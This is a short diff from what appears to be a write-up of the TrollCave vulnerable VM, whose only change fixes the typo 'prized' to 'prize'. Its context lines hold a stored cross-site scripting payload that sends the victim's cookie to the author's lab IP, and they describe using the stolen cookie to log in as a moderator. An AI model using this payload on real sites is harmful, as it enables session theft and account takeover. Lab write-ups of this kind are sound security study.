ofasgard/VulnVMWriteUps/TrollCave.md

 `<SCRIPT id=test>document.write('<img src="http://192.168.56.1/collect.gif?cookie=' + document.cookie + '" />')</SCRIPT>`

 All I needed on the backend was a simple little Python script to collect the cookies being sent to my IP address.
 My assumption was correct - the page was being periodically accessed by cooldude89, and I shortly harvested his cookie and used it to log in as him.
-Now as moderator, I was able to set my sights on a higher prized.
+Now as moderator, I was able to set my sights on a higher prize.

 ## Escalating from Moderator